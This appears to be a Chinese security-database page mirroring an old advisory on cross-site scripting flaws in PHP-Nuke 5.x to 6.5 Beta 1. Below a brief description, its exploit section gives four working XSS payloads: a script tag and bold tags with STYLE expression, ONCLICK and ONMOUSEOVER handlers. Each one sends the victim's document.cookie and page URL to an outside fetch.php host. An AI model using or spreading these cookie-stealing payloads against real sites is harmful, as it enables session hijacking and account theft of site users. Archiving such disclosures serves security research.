PHP-Nuke 5.x/6.0/6.5 Beta 1 – Multiple Cross-Site Scripting Vulnerabilities

PHP-Nuke 5.x/6.0/6.5 Beta 1 – Multiple Cross-Site Scripting Vulnerabilities

漏洞ID 1053644 漏洞类型
发布时间 2002-11-25 更新时间 2002-11-25
图片[1]-PHP-Nuke 5.x/6.0/6.5 Beta 1 – Multiple Cross-Site Scripting Vulnerabilities-安全小百科CVE编号 N/A
图片[2]-PHP-Nuke 5.x/6.0/6.5 Beta 1 – Multiple Cross-Site Scripting Vulnerabilities-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22037
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/6244/info

everal cross site scripting vulnerabilities have been reported for PHP-Nuke.

An attacker may exploit this vulnerability by enticing a victim user to follow a malicious link. Attacker-supplied HTML and script code may be executed on a web client in the context of the site hosting the web-based forum.

Attackers may potentially exploit this issue to manipulate web content or to steal cookie-based authentication credentials. It may be possible to take arbitrary actions as the victim user.

<SCRIPT>location.href="http://www.techie.hopto.org/fetch.php?
[email protected]&ref="+document.URL+"cookie="+document.cookie;

<B
STYLE="left:expression(eval('location.href='http://www.techie.hopto.org/
[email protected]&ref='+document.URL+'cookie='+
document.cookie'))">Bold text -- or an attack?</B>
<B
ONCLICK="location.href='http://www.techie.hopto.org/fetch.php?
[email protected]&ref='+document.URL+'cookie='+document.cookie">
Don't Click</B>
<B
ONMOUSEOVER="location.href='http://www.techie.hopto.org/fetch.php?
[email protected]&ref='+document.URL+'cookie='+document.cookie">Keep
Away!</B>

相关推荐: PhpWebGallery Cookie Manipulation Account Compromise Vulnerability

PhpWebGallery Cookie Manipulation Account Compromise Vulnerability 漏洞ID 1102139 漏洞类型 Design Error 发布时间 2002-04-27 更新时间 2002-04-27 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享